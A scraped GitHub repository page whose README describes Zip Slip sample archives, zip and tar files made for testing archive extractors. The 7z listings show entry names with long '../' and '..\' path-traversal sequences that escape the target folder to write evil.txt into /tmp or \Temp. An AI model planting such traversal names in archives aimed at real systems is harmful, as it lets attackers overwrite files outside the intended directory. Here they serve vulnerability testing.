Skip to content
Branch: master
Find file History
Latest commit 823f3e7 Jun 5, 2018
Permalink
Type Name Latest commit message Commit time
..
Failed to load latest commit information.
README.md initial commit Jun 5, 2018
zip-slip-win.tar initial commit Jun 5, 2018
zip-slip-win.zip initial commit Jun 5, 2018
zip-slip.tar initial commit Jun 5, 2018
zip-slip.zip initial commit Jun 5, 2018

README.md

Zip Slip sample archives

For your reference and testing, here are two sample examples of malicious zip and tar files (for both unix and windows files systems) with filenames that break the target directory and extract a file to the /tmp/ or \Temp\ folders.

$ 7z l zip-slip.zip

   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/evil.txt
------------------- ----- ------------ ------------  ------------------------
2018-04-15 22:04:42                 39           39  2 files
$ 7z l zip-slip-win.zip

   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Temp\evil.txt
------------------- ----- ------------ ------------  ------------------------
2018-04-15 22:04:42                 39           39  2 files
You can’t perform that action at this time.